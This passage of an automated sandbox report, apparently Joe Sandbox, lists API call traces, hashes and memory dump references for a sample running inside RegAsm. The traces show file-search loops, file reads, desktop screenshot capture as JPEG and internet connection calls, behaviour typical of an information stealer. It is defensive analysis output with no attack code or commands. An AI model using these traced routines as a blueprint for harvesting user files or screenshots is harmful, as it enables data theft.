                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocLocal
                                              • String ID: ;?A
                                              • API String ID: 3494564517-2390394969
                                              • Opcode ID: a3a0059e95a87a9fcc8fc8a6337827a09b0dfb723fb73be33f2118c884aa4573
                                              • Instruction ID: c44edc91172df6a2d8209c5a0fcd147b768fef4e3eedf00798d2b23ed28c33c3
                                              • Opcode Fuzzy Hash: a3a0059e95a87a9fcc8fc8a6337827a09b0dfb723fb73be33f2118c884aa4573
                                              • Instruction Fuzzy Hash: F1F0E53A7456245B87224F1D88009ABBB6ADBC6F71708815BEF489B328E935EC8146E4
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00411ACA
                                              • GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AttributesFileH_prolog
                                              • String ID:
                                              • API String ID: 3244726999-0
                                              • Opcode ID: a7baa9448075d694253ad54aa70fb5df7ed32d610110c51e88affe5f5644873c
                                              • Instruction ID: 66564002f8fcbdb34db8f758fad317d469f1b10f1c834de6712175aca51a9515
                                              • Opcode Fuzzy Hash: a7baa9448075d694253ad54aa70fb5df7ed32d610110c51e88affe5f5644873c
                                              • Instruction Fuzzy Hash: D3E09231A01124ABCB04DFA4C9452CDB720EF117A4F10820AE923E22E0EB384E81CE84
                                              APIs
                                              • VirtualAlloc.KERNEL32(?,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 004065EF
                                              • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000040,?,00000000,?,?,00406992,00000000,00000000), ref: 0040661B
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 62af60d5be89a0596f68d47936175bdc582ebf75dcd0c2a45f785f654d032215
                                              • Instruction ID: ddf1fed1729771b343b2ee6822016c73bc61a629061e7931cd77314999066227
                                              • Opcode Fuzzy Hash: 62af60d5be89a0596f68d47936175bdc582ebf75dcd0c2a45f785f654d032215
                                              • Instruction Fuzzy Hash: 2D21C071600704ABC724CFB4CC81BABBBE5AB51314F24082EE61BE73D0D679E9408718
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0040E085
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411B09: SHGetFolderPathA.SHELL32(00000000,lB,00000000,00000000,?), ref: 00411B3A
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00411AC5: _EH_prolog.MSVCRT ref: 00411ACA
                                                • Part of subcall function 00411AC5: GetFileAttributesA.KERNEL32(00000000,?,0040C672,?,00426CA3,?,?), ref: 00411ADE
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 0040B528: _EH_prolog.MSVCRT ref: 0040B52D
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prolog$lstrcpy$lstrcat$AttributesFileFolderPathlstrlen
                                              • String ID:
                                              • API String ID: 2625060131-0
                                              • Opcode ID: d3b388acb8e52f8f0e9a798c99727d10bb19b90952e1e5c6d4f07461b432e805
                                              • Instruction ID: 92344c9dd13ccb461941bb84c380d939bf438741553a66a02b1f5b3ac02e0490
                                              • Opcode Fuzzy Hash: d3b388acb8e52f8f0e9a798c99727d10bb19b90952e1e5c6d4f07461b432e805
                                              • Instruction Fuzzy Hash: 1A917371C0124CEACF05EBE5D946ADEBBB8AF19304F10415EF445632C2DB782788CBA6
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 03a2e1c2cf91ea7924cc7b1d25e2e67bb2d1624b918509cae87971aef5fcc72e
                                              • Instruction ID: 13de0ee2bbba44081eee024592a0435cafe709557d276950de3c4a7bfd5f7e37
                                              • Opcode Fuzzy Hash: 03a2e1c2cf91ea7924cc7b1d25e2e67bb2d1624b918509cae87971aef5fcc72e
                                              • Instruction Fuzzy Hash: AE412C71E002169FCF14EF94DD849AEBBB1AB05314F12847FE916B7391D6389EA08F58
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00416829
                                              • wsprintfA.USER32 ref: 0041684F
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00416866
                                              • memset.MSVCRT ref: 0041687D
                                              • memset.MSVCRT ref: 0041688B
                                              • StrCmpCA.SHLWAPI(?,0042790C), ref: 004168A9
                                              • StrCmpCA.SHLWAPI(?,00427910), ref: 004168C3
                                              • wsprintfA.USER32 ref: 004168E7
                                              • StrCmpCA.SHLWAPI(?,004276C3), ref: 004168F8
                                              • wsprintfA.USER32 ref: 0041691E
                                              • wsprintfA.USER32 ref: 00416932
                                              • memset.MSVCRT ref: 00416944
                                              • lstrcat.KERNEL32(?,?), ref: 00416956
                                              • strtok_s.MSVCRT ref: 0041698F
                                              • memset.MSVCRT ref: 004169A4
                                              • lstrcat.KERNEL32(?,?), ref: 004169B9
                                              • PathMatchSpecA.SHLWAPI(?,00000000), ref: 004169DC
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00416ADE
                                              • strtok_s.MSVCRT ref: 00416B0F
                                              • FindNextFileA.KERNEL32(000000FF,?), ref: 00416C32
                                              • FindClose.KERNEL32(000000FF), ref: 00416C43
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: H_prologlstrcatlstrcpymemsetwsprintf$Find$Filestrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@lstrlen
                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\*.*
                                              • API String ID: 264515753-332874205
                                              • Opcode ID: cd97191f2bec433205b5db389b7ddf1aa7acef6f7e1a6162ac01d66056195985
                                              • Instruction ID: b12f10b5e76acf3b4554e4d27cd34d13087d496de5adceb57af86d68189f51cf
                                              • Opcode Fuzzy Hash: cd97191f2bec433205b5db389b7ddf1aa7acef6f7e1a6162ac01d66056195985
                                              • Instruction Fuzzy Hash: CDC192B1900249AFDF21EFA4DC45EEE7BBDAF09304F10405AF515E2191EB789A88CB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004176E3
                                              • wsprintfA.USER32 ref: 00417703
                                              • FindFirstFileA.KERNEL32(?,?), ref: 0041771A
                                              • StrCmpCA.SHLWAPI(?,004279C8), ref: 00417737
                                              • StrCmpCA.SHLWAPI(?,004279CC), ref: 00417751
                                              • wsprintfA.USER32 ref: 00417775
                                              • StrCmpCA.SHLWAPI(?,004276CF), ref: 00417786
                                              • wsprintfA.USER32 ref: 004177A3
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • wsprintfA.USER32 ref: 004177B7
                                              • PathMatchSpecA.SHLWAPI(?,?), ref: 004177CA
                                              • lstrcat.KERNEL32(?,?), ref: 004177F6
                                              • lstrcat.KERNEL32(?,004279E4), ref: 00417808
                                              • lstrcat.KERNEL32(?,?), ref: 00417818
                                              • lstrcat.KERNEL32(?,004279E8), ref: 0041782A
                                              • lstrcat.KERNEL32(?,?), ref: 0041783E
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 004179D9
                                              • FindClose.KERNEL32(00000000), ref: 004179E8
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Filelstrcat$H_prologwsprintf$Find$CloseCreatelstrcpy$AllocFirstHandleLocalMatchNextObjectPathReadSingleSizeSpecThreadWait
                                              • String ID: %s\%s$%s\%s$%s\*
                                              • API String ID: 3254224521-445461498
                                              • Opcode ID: 42aff5a7a86f482ea89734ff0b5cb4d9c81233b9d5fe59a4731e6acf6e4d0304
                                              • Instruction ID: b40771e78c1d0e7721a8fae64b10e5fcd75ea34c047ff05d04bc0f2fc121e518
                                              • Opcode Fuzzy Hash: 42aff5a7a86f482ea89734ff0b5cb4d9c81233b9d5fe59a4731e6acf6e4d0304
                                              • Instruction Fuzzy Hash: F8919071904249AFDF11EBA4DD4AADE7BBCAF09304F10409AF505E2191EB7897C8CBA5
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 004120EA
                                              • memset.MSVCRT ref: 00412110
                                              • GetDesktopWindow.USER32 ref: 00412146
                                              • GetWindowRect.USER32(00000000,?), ref: 00412153
                                              • GetDC.USER32(00000000), ref: 0041215A
                                              • CreateCompatibleDC.GDI32(00000000), ref: 00412164
                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 00412175
                                              • SelectObject.GDI32(00000000,00000000), ref: 00412180
                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041219C
                                              • GlobalFix.KERNEL32(?), ref: 004121FA
                                              • GlobalSize.KERNEL32(?), ref: 00412206
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00410742: lstrcpy.KERNEL32(00000000,FEE0858D), ref: 00410768
                                                • Part of subcall function 004043AD: _EH_prolog.MSVCRT ref: 004043B2
                                                • Part of subcall function 004043AD: lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00404432
                                                • Part of subcall function 004043AD: StrCmpCA.SHLWAPI(?,00426987,00426983,0042697B,00426977), ref: 004044A4
                                                • Part of subcall function 004043AD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004044C4
                                              • SelectObject.GDI32(00000000,?), ref: 00412280
                                              • DeleteObject.GDI32(?), ref: 0041229B
                                              • DeleteObject.GDI32(00000000), ref: 004122A2
                                              • ReleaseDC.USER32(00000000,?), ref: 004122AC
                                              • CloseWindow.USER32(00000000), ref: 004122B3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                              • String ID: image/jpeg
                                              • API String ID: 3067874393-3785015651
                                              • Opcode ID: d814f4808cc6073ac876f39dc9ff89d143fd4f415de4e544dcf7d24b90ece696
                                              • Instruction ID: 6f0dfb852c061cc8870e769f5ae699a1cb20ad8096a8b1f72079f4e5cf221edf
                                              • Opcode Fuzzy Hash: d814f4808cc6073ac876f39dc9ff89d143fd4f415de4e544dcf7d24b90ece696
                                              • Instruction Fuzzy Hash: 155128B6900218AFDB01DFE4DD499EEBFB9EF0A314F10502AFA01E2160D7354A958B65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 0041729A
                                              • GetProcessHeap.KERNEL32(00000000,0098967F,?,00000104), ref: 004172B2
                                              • HeapAlloc.KERNEL32(00000000,?,00000104), ref: 004172B9
                                              • wsprintfA.USER32 ref: 004172D1
                                              • FindFirstFileA.KERNEL32(?,?), ref: 004172E8
                                              • StrCmpCA.SHLWAPI(?,004279AC), ref: 00417305
                                              • StrCmpCA.SHLWAPI(?,004279B0), ref: 0041731F
                                              • wsprintfA.USER32 ref: 00417343
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00411944: _EH_prolog.MSVCRT ref: 00411949
                                                • Part of subcall function 00411944: GetSystemTime.KERNEL32(?,004274F0,00000001,000000C8,00000000,0042770F), ref: 00411989
                                                • Part of subcall function 00410884: _EH_prolog.MSVCRT ref: 00410889
                                                • Part of subcall function 00410884: lstrlenA.KERNEL32(?,?,?,?,?,0041874B,?,?,00427BD8,?,00000000,00427716), ref: 004108B1
                                                • Part of subcall function 00410884: lstrcpy.KERNEL32(00000000), ref: 004108D8
                                                • Part of subcall function 00410884: lstrcat.KERNEL32(?,?), ref: 004108E3
                                                • Part of subcall function 00410810: _EH_prolog.MSVCRT ref: 00410815
                                                • Part of subcall function 00410810: lstrcpy.KERNEL32(00000000), ref: 00410861
                                                • Part of subcall function 00410810: lstrcat.KERNEL32(?,?), ref: 0041086B
                                                • Part of subcall function 004107C9: lstrcpy.KERNEL32(00000000,?), ref: 00410802
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00413B47: _EH_prolog.MSVCRT ref: 00413B4C
                                                • Part of subcall function 00413B47: memset.MSVCRT ref: 00413B6D
                                                • Part of subcall function 00413B47: memset.MSVCRT ref: 00413B7B
                                                • Part of subcall function 00413B47: lstrcat.KERNEL32(?,00000000), ref: 00413BA7
                                                • Part of subcall function 00413B47: lstrcat.KERNEL32(?), ref: 00413BC5
                                                • Part of subcall function 00413B47: lstrcat.KERNEL32(?,?), ref: 00413BD9
                                                • Part of subcall function 00413B47: lstrcat.KERNEL32(?), ref: 00413BEC
                                                • Part of subcall function 00413B47: StrStrA.SHLWAPI(00000000), ref: 00413C86
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00417472
                                              • FindClose.KERNEL32(00000000), ref: 00417481
                                              • lstrcat.KERNEL32(?,?), ref: 004174A6
                                              • lstrcat.KERNEL32(?), ref: 004174B9
                                              • lstrlenA.KERNEL32(?), ref: 004174C2
                                              • lstrlenA.KERNEL32(?), ref: 004174CF
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: lstrcat$H_prolog$lstrcpy$Findlstrlen$FileHeapmemsetwsprintf$AllocCloseFirstNextProcessSystemTime
                                              • String ID: %s\%s$%s\*
                                              • API String ID: 398052587-2848263008
                                              • Opcode ID: 37b2c64871137dd15fce1ba1004ff85981e9855166a87e3a0e60d662b1e00529
                                              • Instruction ID: 78fcd9c27a4ac5c97fb793c6618bb365e684501d37c762ca59ca7e4cb42f06b4
                                              • Opcode Fuzzy Hash: 37b2c64871137dd15fce1ba1004ff85981e9855166a87e3a0e60d662b1e00529
                                              • Instruction Fuzzy Hash: 06818C71904259AFDF00EBE4DD49BEEBB79AF0A308F00409AF515A3191EB785788CB65
                                              APIs
                                              • _EH_prolog.MSVCRT ref: 00416EF6
                                              • wsprintfA.USER32 ref: 00416F19
                                              • FindFirstFileA.KERNEL32(?,?), ref: 00416F30
                                              • StrCmpCA.SHLWAPI(?,00427994), ref: 00416F52
                                              • StrCmpCA.SHLWAPI(?,00427998), ref: 00416F6C
                                              • lstrcat.KERNEL32(?,?), ref: 00416FA1
                                              • lstrcat.KERNEL32(?), ref: 00416FB4
                                              • lstrcat.KERNEL32(?,?), ref: 00416FC8
                                              • lstrcat.KERNEL32(?,?), ref: 00416FD8
                                              • lstrcat.KERNEL32(?,0042799C), ref: 00416FEA
                                              • lstrcat.KERNEL32(?,?), ref: 00416FFE
                                                • Part of subcall function 0041070B: lstrcpy.KERNEL32(00000000,00000000), ref: 00410735
                                                • Part of subcall function 00406CC8: _EH_prolog.MSVCRT ref: 00406CCD
                                                • Part of subcall function 00406CC8: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406CF0
                                                • Part of subcall function 00406CC8: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406D07
                                                • Part of subcall function 00406CC8: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D23
                                                • Part of subcall function 00406CC8: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406D3D
                                                • Part of subcall function 00406CC8: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406D5E
                                                • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                • Part of subcall function 00415865: _EH_prolog.MSVCRT ref: 0041586A
                                                • Part of subcall function 00415865: CreateThread.KERNEL32(00000000,00000000,00414052,?,00000000,00000000), ref: 00415910
                                                • Part of subcall function 00415865: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00415918
                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00417098
                                              • FindClose.KERNEL32(00000000), ref: 004170A7
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.3325415366.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000002.00000002.3325415366.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
                                              • Associated: 00000002.00000002.3325415366.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
